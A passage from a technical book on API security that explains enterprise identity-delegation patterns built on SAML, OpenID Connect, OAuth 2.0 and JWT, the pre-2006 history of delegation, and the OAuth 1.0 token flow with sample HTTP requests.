The catch here is the statement, "All the users are in a Windows domain, and once they're logged in to their workstations, they shouldn't be asked to provide credentials at any point for any other application." You need to extend the solution we provided using single sign-on (SSO) with the Delegated Access Control pattern (the second pattern). In that case, the user logs in to the SAML 2.0 identity provider with their Active Directory username and password. Here, this isn't acceptable. Instead, you can use Integrated Windows Authentication (IWA) to secure the SAML 2.0 identity provider. When you configure the SAML 2.0 identity provider to use IWA, once the user is redirected to the identity provider for authentication, the user is automatically authenticated; as in the case of SSO with the Delegated Access Control pattern, a SAML response is passed to the web application. The rest of the flow remains unchanged.

Identity Proxy with the Delegated Access Control

Suppose a medium-scale enterprise has a number of APIs. Company employees, as well as employees from trusted partners, are allowed to access these APIs via web applications. All the internal user data are stored in Microsoft Active Directory, and all the web applications are connected to a SAML 2.0 identity provider to authenticate users. The web applications need to access back-end APIs on behalf of logged-in users.

Figure 15-3. Identity proxy with the Delegated Access Control pattern

This use case is an extension of using SSO with the Delegated Access Control pattern. The catch here is the statement, "company employees, as well as employees from trusted partners, are allowed to access these APIs via web applications." You now have to go beyond the company domain. Everything in Figure 15-2 remains unchanged. The only thing you need to do is change the authentication mechanism at the SAML 2.0 identity provider (see Figure 15-3). Regardless of the end user's domain, the client web application only trusts the identity provider in its own domain.
Internal as well as external users are first redirected to the internal (or local) SAML identity provider. The local identity provider should offer the user the option to either authenticate with a username and password (for internal users) or pick the corresponding external domain. In the latter case, the identity provider redirects the user to the identity provider running in the external user's home domain. The external identity provider then returns a SAML response, signed by itself, to the internal identity provider. If the signature is valid, and if it's from a trusted external identity provider, the internal identity provider issues a new SAML token, signed by itself, to the calling application. The flow then continues as shown in Figure 15-2.

Note One benefit of this approach is that the internal applications only need to trust their own identity provider. The identity provider handles the brokering of trust between other identity providers outside its domain. In this scenario, the external identity provider also talks SAML, but that can't be expected all the time. There are also identity providers that support other protocols. In such scenarios, the internal identity provider must be able to transform identity assertions between different protocols.

Delegated Access Control with the JSON Web Token

Suppose a medium-scale enterprise has a number of APIs. Company employees are allowed to access these APIs via web applications while they're behind the company firewall. All user data are stored in Microsoft Active Directory, and all the web applications are connected to an OpenID Connect identity provider to authenticate users. The web applications need to access back-end APIs on behalf of the logged-in user.

This use case is also an extension of the SSO with the Delegated Access Control pattern. The catch here is the statement, "all the web applications are connected to an OpenID Connect identity provider to authenticate users." You need to replace the SAML identity provider shown in Figure 15-2 with an OpenID Connect identity provider, as illustrated in Figure 15-4. This also suggests the need for an access delegation protocol (OAuth). In this case, however, users don't present their credentials directly to the web application; rather, they authenticate through an OpenID Connect identity provider. Thus, you need to find a way to exchange the ID token received in OpenID Connect authentication for an OAuth access token, which is defined in the JWT grant type for the OAuth 2.0 specification (see Chapter 12). Once the web application receives the ID token in step 3, which is also a JWT, it has to exchange it for an access token by talking to the OAuth 2.0 authorization server. The authorization server must trust the OpenID Connect identity provider. When the web application gets the access token, it can use it to access back-end APIs.

Figure 15-4. Delegated Access Control with the JWT pattern

Note Why would someone exchange the ID token obtained in OpenID Connect for an access token when it directly gets an access token along with the ID token? This is not required when both the OpenID Connect server and the OAuth authorization server are the same. If they aren't, you have to use the JWT Bearer grant type for OAuth 2.0 and exchange the ID token for an access token. The access token issuer must trust the OpenID Connect identity provider.
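The exchange mentioned in the note can be pictured with a minimal, hypothetical request following the JWT bearer grant type for OAuth 2.0 (RFC 7523); the token endpoint host and client_id are illustrative, and the assertion parameter carries the ID token (itself a JWT) received from the OpenID Connect identity provider:

POST /token HTTP/1.1
Host: authz.example.com
Content-Type: application/x-www-form-urlencoded

grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer
&assertion=eyJhbGciOiJSUzI1NiIs...(the ID token, truncated)
&client_id=webapp1

If the assertion's signature checks out and its issuer is the trusted OpenID Connect identity provider, the authorization server responds with an access token the web application can use against the back-end APIs.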
Nonrepudiation with the JSON Web Signature

Suppose a medium-scale enterprise in the finance industry needs to expose an API to its customers through a mobile application, as illustrated in Figure 15-5. One major requirement is that all the API calls should support nonrepudiation.

The catch here is the statement, "all the API calls should support nonrepudiation." When you do a business transaction via an API by proving your identity, you shouldn't be able to reject it later or repudiate it. The property that ensures the inability to repudiate is known as nonrepudiation. Basically, you do it once, and you own it forever (see Chapter 2 for details). Nonrepudiation should provide proof of the origin and the integrity of data in an unforgeable manner, which a third party can verify at any time. Once a transaction is initiated, none of its content, including the user identity, date, time, and transaction details, should be altered while in transit, in order to maintain transaction integrity and to allow for future verifications. Nonrepudiation has to ensure that the transaction is unaltered and logged after it's committed and confirmed. Logs must be archived and properly secured to prevent unauthorized modifications. Whenever there is a repudiation dispute, transaction logs, along with other logs or data, can be retrieved to verify the initiator, date, time, transaction history, and so on.

The way to achieve nonrepudiation is via a signature. A key known only to the end user should sign each message. In this case, the financial institution must issue a key pair to each of its customers, signed by a certificate authority under its control. It should only store the corresponding public certificate, not the private key. The customer can install the private key on his or her mobile device and make it available to the mobile application. All API calls generated from the mobile application must be signed by the private key of the user and encrypted with the public key of the financial institution. To sign the message, the mobile application can use JSON Web Signature (see Chapter 7); and for encryption, it can use JSON Web Encryption (see Chapter 8). When using both signature and encryption on the same payload, the message must be signed first, and then the signed payload must be encrypted, for legal acceptance.

Figure 15-5. Nonrepudiation with the JSON Web Signature pattern
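The sign-then-encrypt ordering can be pictured with a purely illustrative sketch of an API call from the mobile application; the endpoint, host, header values, and key identifiers here are assumptions for the example, not part of the pattern itself. The transaction payload is first wrapped in a JWS signed with the customer's private key, and that JWS then becomes the plaintext of a JWE encrypted for the financial institution:

POST /transactions HTTP/1.1
Host: api.finance.example
Content-Type: application/jose

BASE64URL({"alg":"RSA-OAEP","enc":"A256GCM","cty":"JWT"}).<encrypted key>.<iv>.
  <ciphertext of the inner JWS:
    BASE64URL({"alg":"RS256","kid":"customer-key-1"}).BASE64URL(transaction claims).<signature>
  >.<authentication tag>

On the receiving end, the financial institution decrypts the outer JWE with its private key, verifies the inner JWS against the customer's stored public certificate, and archives the verified message so it can be produced later if a repudiation dispute arises.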
In summary, a mobile application accesses the Water API on behalf of the end user, and then the Water API has to access the MyHealth API on behalf of the end user. The Water API and the MyHealth API are in two independent domains. This suggests the need for an access delegation protocol. Figure 15-6. Chained Access Delegation pattern Chapter 15 patterns and praCtiCes 314 Again, the catch here is the statement, “the Water API must also update the user’s healthcare record maintained at MyHealth.org.” This has two solutions. In the first solution, the end user must get an access token from MyHealth.org for the Water API (the Water API acts as the OAuth client), and then the Water API must store the token internally against the user’s name. Whenever the user sends an update through a mobile application to the Water API, the Water API first updates its own record and then finds the MyHealth access token corresponding to the end user and uses it to access the MyHealth API. With this approach, the Water API has the overhead of storing the MyHealth API access token, and it should refresh the access token whenever needed. The second solution is explained in Figure 15-6. It’s built around the OAuth 2.0 Token Delegation profile (see Chapter 9). The mobile application must carry a valid access token to access the Water API on behalf of the end user. In step 3, the Water API talks to its own authorization server to validate the access token. Then, in step 4, the Water API exchanges the access token it got from the mobile application for a JWT access token. The JWT access token is a special access token that carries some meaningful data, and the authorization server in the Water API’s domain signs it. The JWT includes the end user’s local identifier (corresponding to the Water API) as well as its mapped identifier in the MyHealth domain. The end user must permit this action at the Water API domain. In step 6, the Water API accesses the MyHealth API using the JWT access token. The MyHealth API validates the JWT access token by talking to its own authorization server. It verifies the signature; and, if it’s signed by a trusted entity, the access token is treated as valid. Because the JWT includes the mapped username from the MyHealth domain, it can identify the corresponding local user record. However, this raises a security concern. If you let users update their profiles in the Water API domain with the mapped MyHealth identifier, they can map it to any user identifier, and this leads to a security hole. To avoid this, the account mapping step must be secured with OpenID Connect authentication. When the user wants to add his or her MyHealth account identifier, the Water API domain initiates the OpenID Connect authentication flow and receives the corresponding ID token. Then the account mapping is done with the user identifier in the ID token. Chapter 15 patterns and praCtiCes 315 Trusted Master Access Delegation Suppose a large-scale enterprise that has a number of APIs. The APIs are hosted in different departments, and each department runs its own OAuth 2.0 authorization server due to vendor incompatibilities in different deployments. Company employees are allowed to access these APIs via web applications while they’re behind the company firewall, regardless of the department which they belong to. Figure 15-7. 
Trusted Master Access Delegation pattern

All user data are stored in a centralized Active Directory, and all the web applications are connected to a centralized OAuth 2.0 authorization server (which also supports OpenID Connect) to authenticate users. The web applications need to access back-end APIs on behalf of the logged-in user. These APIs may come from different departments, each of which has its own authorization server. The company also has a centralized OAuth 2.0 authorization server, and an employee having an access token from the centralized authorization server must be able to access any API hosted in any department.

Once again, this is an extended version of using SSO with the Delegated Access Control pattern. You have a master OAuth 2.0 authorization server and a set of secondary authorization servers. An access token issued from the master authorization server should be good enough to access any of the APIs under the control of the secondary authorization servers. In other words, the access token returned to the web application, as shown in step 3 of Figure 15-7, should be good enough to access any of the APIs. To make this possible, you need to make the access token self-contained. Ideally, you should make the access token a JWT that carries the iss (issuer) field. In step 4, the web application accesses the API using the access token; and in step 5, the API talks to its own authorization server to validate the token. The authorization server can look at the iss claim inside the JWT and find out whether it issued this token or a different server did. If the master authorization server issued it, the secondary authorization server can talk to the master authorization server's OAuth introspection endpoint to find out more about the token. The introspection response specifies whether the token is active and identifies the scopes associated with the access token. Using the introspection response, the secondary authorization server can build an eXtensible Access Control Markup Language (XACML) request and call a XACML policy decision point (PDP). If the XACML response evaluates to permit, the web application can access the API. Then again, XACML is a little too complex for defining access control policies, however powerful it is. You can also check the Open Policy Agent (OPA) project, which has recently become quite popular for building fine-grained access control policies.
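The introspection call the secondary authorization server makes against the master authorization server's introspection endpoint follows OAuth 2.0 Token Introspection (RFC 7662). The following is a minimal, hypothetical exchange; the host, credentials, and claim values are illustrative only:

POST /introspect HTTP/1.1
Host: master-authz.example.com
Authorization: Basic <secondary server's client credentials>
Content-Type: application/x-www-form-urlencoded

token=eyJhbGciOiJSUzI1NiIs...(the JWT access token, truncated)

HTTP/1.1 200 OK
Content-Type: application/json

{
  "active": true,
  "client_id": "webapp1",
  "scope": "read write",
  "sub": "alice@example.com",
  "iss": "https://master-authz.example.com"
}

The active flag and the scope values in this response are what the secondary authorization server would feed into its XACML (or OPA) policy evaluation before letting the request through.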
Resource Security Token Service (STS) with the Delegated Access Control

Suppose a global organization has APIs and API clients distributed across different regions. Each region operates independently from the others. Currently, both clients and APIs are nonsecured. You need to secure the APIs without making any changes at either the API or the client end.

The solution is based on a simple theory in software engineering: introducing a layer of indirection can solve any problem. You need to introduce two interceptors. One sits in the client region, and all the nonsecured messages generated from the client are intercepted. The other interceptor sits in the API region, and all the API requests are intercepted. No other component except this interceptor can access the APIs in a nonsecured manner. This restriction can be enforced at the network level. Any request generated from outside has no path to the API other than through the API interceptor. You would probably deploy both the API interceptor and the API on the same physical machine. You can also call this component a policy enforcement point (PEP) or API gateway. The PEP validates the security of all incoming API requests. The responsibility of the interceptor sitting in the client region is to add the necessary security parameters to the nonsecured messages generated from the client and send them to the API. In this way, you can secure the API without making changes at either the client or the API end. Still, you have a challenge: how do you secure the API at the API gateway? This is a cross-domain scenario, and the obvious choice is to use the JWT grant type for OAuth 2.0. Figure 15-8 explains how the solution is implemented.

Figure 15-8. Resource STS with the Delegated Access Control pattern

Nonsecured requests from the client application are captured by the interceptor component in step 1. It then has to talk to its own security token service (STS). In step 2, the interceptor uses a default user account to access the STS using the OAuth 2.0 client credentials grant type. The STS authenticates the request and issues a self-contained access token (a JWT), with the STS in the API region as the audience of the token. In step 3, the client-side interceptor authenticates to the STS at the API region with the JWT and gets a new JWT, following the OAuth 2.0 Token Delegation profile, which we discussed in Chapter 9. The audience of the new JWT is the OAuth 2.0 authorization server running in the API region. Before issuing the new JWT, the STS at the API region must validate its signature and check whether a trusted entity has signed it. To make this scenario happen, the STS in the API region must trust the STS on the client side. The OAuth 2.0 authorization server only trusts its own STS. That is why step 4 is required. Step 4 initiates the JWT grant type for OAuth 2.0, and the client interceptor exchanges the JWT issued by the STS of the API region for an access token. Then it uses that access token to access the API in step 5. The PEP in the API region intercepts the request and calls the authorization server to validate the access token. If the token is valid, the PEP lets the request hit the API (step 7).

Delegated Access Control with No Credentials over the Wire

Suppose a company wants to expose an API to its employees. However, user credentials must never go over the wire. This is a straightforward problem with an equally straightforward solution. Both OAuth 2.0 bearer tokens and HTTP Basic authentication take user credentials over the wire. Even though both these approaches use TLS for protection, some companies still worry about passing user credentials over communication channels—or, in other words, passing bearer tokens over the wire. You have a few options: use either HTTP Digest authentication or OAuth 2.0 MAC tokens (Appendix G). Using OAuth 2.0 MAC tokens is the better approach because the access token is generated for each API, and the user can also revoke the token if needed without changing the password. However, the OAuth 2.0 MAC token profile is not mature yet. The other approach is to use OAuth 2.0 with Token Binding, which we discussed in Chapter 11. Even though we use bearer tokens there, with Token Binding, we bind the token to the underlying TLS channel—so no one can export the token and use it somewhere else. There are a few more draft proposals discussed under the IETF OAuth working group to address this concern.
The OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens is one of them, available at https://tools.ietf.org/ html/draft-ietf-oauth-mtls-17. Chapter 15 patterns and praCtiCes 319 Summary • API security is an ever-evolving subject. • More and more standards and specifications are popping up, and most of them are built around the core OAuth 2.0 specification. • Security around JSON is another evolving area, and the IETF JOSE working group is currently working on it. • It’s highly recommended that if you wish to continue beyond this book, you should keep an eye on the IETF OAuth working group, the IETF JOSE working group, the OpenID Foundation, and the Kantara Initiative. Chapter 15 patterns and praCtiCes 321 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_16 APPENDIX A The Evolution of Identity Delegation Identity delegation plays a key role in securing APIs. Most of the resources on the Web today are exposed over APIs. The Facebook API exposes your Facebook wall, the Twitter API exposes your Twitter feed, Flickr API exposes your Flickr photos, Google Calendar API exposes your Google Calendar, and so on. You could be the owner of a certain resource (Facebook wall, Twitter feed, etc.) but not the direct consumer of an API. There may be a third party who wants to access an API on your behalf. For example, a Facebook app may want to import your Flickr photos on behalf of you. Sharing credentials with a third party who wants to access a resource you own on your behalf is an antipattern. Most web-based applications and APIs developed prior to 2006 utilized credential sharing to facilitate identity delegation. Post 2006, many vendors started developing their own proprietary ways to address this concern without credential sharing. Yahoo! BBAuth, Google AuthSub, and Flickr Authentication are some of the implementations that became popular. A typical identity delegation model has three main roles: delegator, delegate, and service provider. The delegator owns the resource and is also known as the resource owner. The delegate wants to access a service on behalf of the delegator. The delegator delegates a limited set of privileges to the delegate to access the service. The service provider hosts the protected service and validates the legitimacy of the delegate. The service provider is also known as the resource server. 322 Direct Delegation vs. Brokered Delegation Let’s take a step back and look at a real-world example (see Figure A-1). Flickr is a popular cloud-based service for storing and sharing photos. Photos stored in Flickr are the resources, and Flickr is the resource server or the service provider. Say you have a Flickr account: you’re the resource owner (or the delegator) of the photos under your account. You also have a Snapfish account. Snapfish is a web-based photo-sharing and photo-printing service that is owned by Hewlett-Packard. How can you print your Flickr photos from Snapfish? To do so, Snapfish has to first import those photos from Flickr and should have the privilege to do so, which should be delegated to Snapfish by you. You’re the delegator, and Snapfish is the delegate. Other than the privilege to import photos, Snapfish won’t be able to do any of the following with your Flickr photos: • Access your Flickr account (including private content) • Upload, edit, and replace photos and videos in the account • Interact with other members’ photos and videos (comment, add notes, favorite) Figure A-1. 
Direct delegation. The resource owner delegates privileges to the client application Snapfish can now access your Flickr account on your behalf with the delegated privileges. This model is called direct delegation: the delegator directly delegates a subset of his or her privileges to a delegate. The other model is called indirect delegation: the delegator first delegates to an intermediate delegate, and that delegate delegates to another delegate. This is also known as brokered delegation (see Figure A-2). Appendix A The evoluTion of idenTiTy delegATion 323 Let’s say you have a Lucidchart account. Lucidchart is a cloud-based design tool that you can use to draw a wide variety of diagrams. It also integrates with Google Drive. From your Lucidchart account, you have the option to publish completed diagrams to your Google Drive. To do that, Lucidchart needs privileges to access the Google Drive API on your behalf, and you need to delegate the relevant permissions to Lucidchart. If you want to print something from Lucidchart, it invokes the Snapfish printing API. Snapfish needs to access the diagrams stored in your Google Drive. Lucidchart has to delegate a subset of the permissions you delegated to it to Snapfish. Even though you granted read/write permissions to Lucidchart, it only has to delegate read permission to Snapfish to access your Google Drive and print the selected drawings. The Evolution The modern history of identity delegation can be divided into two eras: pre-2006 and post-2006. Credential sharing mostly drove identity delegation prior to 2006. Twitter, SlideShare, and almost all the web applications used credential sharing to access third- party APIs. As shown in Figure A-3, when you created a Twitter account prior to 2006, Twitter asked for your email account credentials so it could access your email address book and invite your friends to join Twitter. Interestingly, it displayed the message “We don’t store your login, your password is submitted securely, and we don’t email without your permission” to win user confidence. But who knows—if Twitter wanted to read all your emails or do whatever it wanted to your email account, it could have done so quite easily. Figure A-2. Brokered delegation. The resource owner delegates privileges to an intermediate application and that application delegates privileges to another application Appendix A The evoluTion of idenTiTy delegATion 324 SlideShare did the same thing. SlideShare is a cloud-based service for hosting and sharing slides. Prior to 2006, if you wanted to publish a slide deck from SlideShare to a Blogger blog, you had to give your Blogger username and password to SlideShare, as shown in Figure A-4. SlideShare used Blogger credentials to access its API to post the selected slide deck to your blog. If SlideShare had wanted to, it could have modified published blog posts, removed them, and so on. Figure A-3. Twitter, pre-2006 Figure A-4. SlideShare, pre-2006 Appendix A The evoluTion of idenTiTy delegATion 325 These are just two examples. The pre-2006 era was full of such applications. Google Calendar, introduced in April 2006, followed a similar approach. Any third-party application that wanted to create an event in your Google Calendar first had to request your Google credentials and use them to access the Google Calendar API. This wasn’t tolerable in the Internet community, and Google was pushed to invent a new and, of course, better way of securing its APIs. Google AuthSub was introduced toward the end of 2006 as a result. 
This was the start of the post-2006 era of identity delegation. Google ClientLogin In the very early stages of its deployment, the Google Data API was secured with two nonstandard security protocols: ClientLogin and AuthSub. ClientLogin was intended to be used by installed applications. An installed application can vary from a simple desktop application to a mobile application—but it can’t be a web application. For web applications, the recommended way was to use AuthSub. Note The complete google Clientlogin documentation is available at https:// developers.google.com/accounts/docs/AuthForInstalledApps. The Clientlogin Api was deprecated as of April 20, 2012. According to the google deprecation policy, it operated the same until April 20, 2015. As shown in Figure A-5, Google ClientLogin uses identity delegation with password sharing. The user has to share his Google credentials with the installed application in the first step. Then the installed application creates a request token out of the credentials, and it calls the Google Accounts Authorization service. After the validation, a CAPTCHA challenge is sent back as the response. The user must respond to the CAPTCHA and is validated again against the Google Accounts Authorization service. Once the user is validated successfully, a token is issued to the application. Then the application can use the token to access Google services. Appendix A The evoluTion of idenTiTy delegATion 326 Google AuthSub Google AuthSub was the recommended authentication protocol to access Google APIs via web applications in the post-2006 era. Unlike ClientLogin, AuthSub doesn’t require credential sharing. Users don’t need to provide credentials for a third-party web application—instead, they provide credentials directly to Google, and Google shares a temporary token with a limited set of privileges with the third-party web application. The third-party application uses the temporary token to access Google APIs. Figure A-6 explains the protocol flow in detail. Figure A-5. Google ClientLogin Figure A-6. Google AuthSub Appendix A The evoluTion of idenTiTy delegATion 327 The end user initiates the protocol flow by visiting the web application. The web application redirects the user to the Google Accounts Authorization service with an AuthSub request. Google notifies the user of the access rights (or the privileges) requested by the application, and the user can approve the request by login. Once approved by the user, Google Accounts Authorization service provides a temporary token to the web application. Now the web application can use that temporary token to access Google APIs. Note The complete google AuthSub documentation is available at https:// developers.google.com/accounts/docs/AuthSub. how to use AuthSub with the google data Api is explained at https://developers.google.com/ gdata/docs/auth/authsub. The AuthSub Api was deprecated as of April 20, 2012. According to the google deprecation policy, it operated the same until April 20, 2015. Flickr Authentication API Flickr is a popular image/video hosting service owned by Yahoo!. Flickr was launched in 2004 (before the acquisition by Yahoo! in 2005), and toward 2005 it exposed its services via a public API. It was one of the very few companies at that time that had a public API; this was even before the Google Calendar API. Flickr was one of the very few applications that followed an identity delegation model without credential sharing prior to 2006. 
Most of the implementations that came after that were highly influenced by the Flickr Authentication API. Unlike in Google AuthSub or ClientLogin, the Flickr model was signature based. Each request should be signed by the application from its application secret. Yahoo! Browser–Based Authentication (BBAuth) Yahoo! BBAuth was launched in September 2006 as a generic way of granting third-party applications access to Yahoo! data with a limited set of privileges. Yahoo! Photos and Yahoo! Mail were the first two services to support BBAuth. BBAuth, like Google AuthSub, borrowed the same concept used in Flickr (see Figure A-7). Appendix A The evoluTion of idenTiTy delegATion 328 The user first initiates the flow by visiting the third-party web application. The web application redirects the user to Yahoo!, where the user has to log in and approve the access request from the third-party application. Once approved by the user, Yahoo! redirects the user to the web application with a temporary token. Now the third-party web application can use the temporary token to access user’s data in Yahoo! with limited privileges. Note The complete guide to yahoo! BBAuth is available at http://developer. yahoo.com/bbauth/. OAuth Google AuthSub, Yahoo! BBAuth, and Flickr Authentication all made considerable contributions to initiate a dialog to build a common standardized delegation model. OAuth 1.0 was the first step toward identity delegation standardization. The roots of OAuth go back to November 2006, when Blaine Cook started developing an OpenID implementation for Twitter. In parallel, Larry Halff of Magnolia (a social bookmarking site) was thinking about integrating an authorization model with OpenID (around this time, OpenID began gaining more traction in the Web 2.0 community). Larry started discussing the use of OpenID for Magnolia with Twitter and found out there is no way to delegate access to Twitter APIs through OpenID. Blaine and Larry, together with Chris Messina, DeWitt Clinton, and Eran Hammer, started a discussion group in April 2007 to Figure A-7. Yahoo! BBAuth Appendix A The evoluTion of idenTiTy delegATion 329 build a standardized access delegation protocol—which later became OAuth. The access delegation model proposed in OAuth 1.0 wasn’t drastically different from what Google, Yahoo!, and Flickr already had. Note openid is a standard developed by the openid foundation for decentralized single sign-on. The openid 2.0 final specification is available at http://openid. net/specs/openid-authentication-2_0.html. The OAuth 1.0 core specification was released in December 2007. Later, in 2008, during the 73rd Internet Engineering Task Force (IETF) meeting, a decision was made to develop OAuth under the IETF. It took some time to be established in the IETF, and OAuth 1.0a was released as a community specification in June 2009 to fix a security issue related to a session fixation attack.1 In April 2010, OAuth 1.0 was released as RFC 5849 under the IETF. Note The oAuth 1.0 community specification is available at http://oauth. net/core/1.0/, and oAuth 1.0a is at http://oauth.net/core/1.0a/. Appendix B explains oAuth 1.0 in detail. In November 2009, during the Internet Identity Workshop (IIW), Dick Hardt of Microsoft, Brian Eaton of Google, and Allen Tom of Yahoo! presented a new draft specification for access delegation. It was called Web Resource Authorization Profiles (WRAP), and it was built on top of the OAuth 1.0 model to address some of its limitations. 
In December 2009, WRAP was deprecated in favor of OAuth 2.0. Note The WRAp specification contributed to the ieTf oAuth working group is available at http://tools.ietf.org/html/draft-hardt-oauth-01. While OAuth was being developed under the OAuth community and the IETF working group, the OpenID community also began to discuss a model to integrate OAuth with OpenID. This effort, initiated in 2009, was called OpenID/OAuth hybrid extension 1 Session fixation, www.owasp.org/index.php/Session_fixation Appendix A The evoluTion of idenTiTy delegATion 330 (see Figure A-8). This extension describes how to embed an OAuth approval request into an OpenID authentication request to allow combined user approval. For security reasons, the OAuth access token isn’t returned in the OpenID authentication response. Instead, a mechanism to obtain the access token is provided. Note The finalized specification for openid/oAuth extension is available at http://step2.googlecode.com/svn/spec/openid_oauth_extension/ latest/openid_oauth_extension.html. Figure A-8. The evolution of identity protocols from OpenID to OpenID Connect OAuth 1.0 provided a good foundation for access delegation. However, criticism arose against OAuth 1.0, mainly targeting its usability and extensibility. As a result, OAuth 2.0 was developed as an authorization framework, rather than a standard protocol. OAuth 2.0 became the RFC 6749 in October 2012 under the IETF. Appendix A The evoluTion of idenTiTy delegATion 331 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_17 APPENDIX B OAuth 1.0 OAuth 1.0 was the first step toward the standardization of identity delegation. OAuth involves three parties in an identity delegation transaction. The delegator, also known as the user, assigns access to his or her resources to a third party. The delegate, also known as the consumer, accesses a resource on behalf of its user. The application that hosts the actual resource is known as the service provider. This terminology was introduced in the first release of the OAuth 1.0 specification under oauth.net. It changed a bit when the OAuth specification was brought into the IETF working group. In OAuth 1.0, RFC 5849, the user (delegator) is known as the resource owner, the consumer (delegate) is known as the client, and the service provider is known as the server. Note The OAuth 1.0 community specification is available at http://oauth. net/core/1.0/, and OAuth 1.0a is at http://oauth.net/core/1.0a/. OAuth 1.0, RFC 5849, made OAuth 1.0 (community version) and 1.0a obsolete. RFC 5849 is available at http://tools.ietf.org/html/rfc5849. The Token Dance Token-based authentication goes back to 1994, when the Mosaic Netscape 0.9 beta version added support for cookies. For the first time, cookies were used to identify whether the same user was revisiting a given web site. Even though it’s not a strong form of authentication, this was the first time in history that a cookie was used for identification. Later, most browsers added support for cookies and started using them as a form of authentication. To log in to a web site, the user gives his or her username and password. Once the user is successfully authenticated, the web server creates a session for that user, and the session identifier is written into a cookie. To reuse the already 332 authenticated session for each request from then onward, the user must attach the cookie. This is the most widely used form of token-based authentication. 
Note RFC 6265 defines the cookie specification in the context of HTTP: see http://tools.ietf.org/html/rfc6265. Figure B-1. OAuth 1.0 token dance Token: A unique identifier issued by the server and used by the client to associate authenticated requests with the resource owner whose authoriza- tion is requested or has been obtained by the client. Tokens have a matching shared-secret that is used by the client to establish its ownership of the token, and its authority to represent the resource owner. —OAuth 1.0 RFC 5849 APPendix B OAuTH 1.0 333 This appendix helps you digest the formal definition given for token by RFC 5849. OAuth uses tokens at different phases in its protocol flow (see Figure B-1). Three main phases are defined in the OAuth 1.0 handshake: the temporary-credential request phase, the resource-owner authorization phase, and the token-credential request phase. Note All three phases in the OAuth 1.0 token dance must happen over Transport Layer Security (TLS). These are bearer tokens, so anyone who steals them can use them. A bearer token is like cash. if you steal 10 bucks from someone, you can still use it at a Starbucks to buy a coffee, and the cashier will not question whether you own or how you earned that 10 bucks. Temporary-Credential Request Phase During the temporary-credential request phase, the OAuth client sends an HTTP POST to the temporary-credential request endpoint hosted in the resource server: POST /oauth/request-token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_signature_method="HMAC-SHA1", oauth_callback="http://client.net/client_cb", oauth_signature="dsDSdsdsdsdddsdsdsd" The authorization header in the request is constructed with the following parameters: • OAuth: The keyword used to identify the type of the authorization header. It must have the value OAuth. • realm: An identifier known to the resource server. Looking at the realm value, the resource server can find out how to authenticate the OAuth client. The value of realm here serves the same purpose as in HTTP Basic authentication, which we discuss in Appendix F. APPendix B OAuTH 1.0 334 • oauth_consumer_key: A unique identifier issued to the OAuth client by the resource server. This key is associated with a secret key that is known both to the client and to the resource server. • oauth_signature_method: The method used to generate the oauth_signature. This can be PLAINTEXT, HMAC-SHA1, or RSA-SHA1. PLAINTEXT means no signature, HMAC-SHA1 means a shared key has been used for the signature, and RSA-SHA1 means an RSA private key has been used for the signature. The OAuth specification doesn’t mandate any signature method. The resource server can enforce any signature method, based on its requirements. • oauth_signature: The signature, which is calculated according to the method defined in oauth_signature_method. Note With PLAINTEXT as the oauth_signature_method, the oauth_signature is the consumer secret followed by &. For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds, then the value of oauth_signature is Ddedkljlj878dskjds&. • oauth_callback: An absolute URI that is under the control of the client. In the next phase, once the resource owner has authorized the access request, the resource server has to redirect the resource owner back to the oauth_callback URI. 
If this is preestablished between the client and the resource server, the value of oauth_callback should be set to oob to indicate that it is out of band. The temporary-credential request authenticates the client. The client must be a registered entity at the resource server. The client registration process is outside the scope of the OAuth specification. The temporary-credential request is a direct HTTP POST from the client to the resource server, and the user isn’t aware of this phase. The client gets the following in response to the temporary-credential request. Both the temporary-credential request and the response must be over TLS: APPendix B OAuTH 1.0 335 HTTP/1.1 200 OK Content-Type: application/x-www-form-urlencoded oauth_token=bhgdjgdds& oauth_token_secret=dsdasdasdse& oauth_callback_confirmed=true Let’s examine the definition of each parameter: • oauth_token: An identifier generated by the resource server. This is used to identify the value of the oauth_token_secret in future requests made by the client to the resource server. This identifier links the oauth_token_secret to the oauth_consumer_key. • oauth_token_secret: A shared secret generated by the resource server. The client will use this in the future requests to generate the oauth_signature. • oauth_callback_confirmed: This must be present and set to true. It helps the client to confirm that the resource server received the oauth_callback sent in the request. To initiate the temporary-credential request phase, the client must first be registered with the resource server and have a consumer key/consumer secret pair. At the end of this phase, the client will have an oauth_token and an oauth_token_secret. Resource-Owner Authorization Phase During the resource-owner authorization phase, the client must get the oauth_token received in the previous phase authorized by the user or the resource owner. The client redirects the user to the resource server with the following HTTP GET request. The oauth_token received in the previous phase is added as a query parameter. Once the request hits the resource server, the resource server knows the client corresponding to the provided token and displays the name of the client to the user on its login page. The user must authenticate first and then authorize the token: GET /authorize_token?oauth_token= bhgdjgdds HTTP/1.1 Host: server.com APPendix B OAuTH 1.0 336 After the resource owner’s approval, the resource server redirects the user to the oauth_callback URL corresponding to the client: GET /client_cb?x=1&oauth_token=dsdsdsdd&oauth_verifier=dsdsdsds HTTP/1.1 Host: client.net Let’s examine the definition of each parameter: • oauth_token: An identifier generated by the resource server. It’s used to identify the value of the oauth_verifier in future requests made by the client to the resource server. This identifier links the oauth_ verifier to the oauth_consumer_key. • oauth_verifier: A shared verification code generated by the resource server. The client will use this in the future requests to generate the oauth_signature. Note if no oauth_callback uRL is registered by the client, the resource server displays a verification code to the resource owner. The resource owner must take it and provide it to the client manually. The process by which the resource owner provides the verification code to the client is outside the scope of the OAuth specification. To initiate the resource-owner authorization phase, the client must have access to the oauth_token and the oauth_token_secret. 
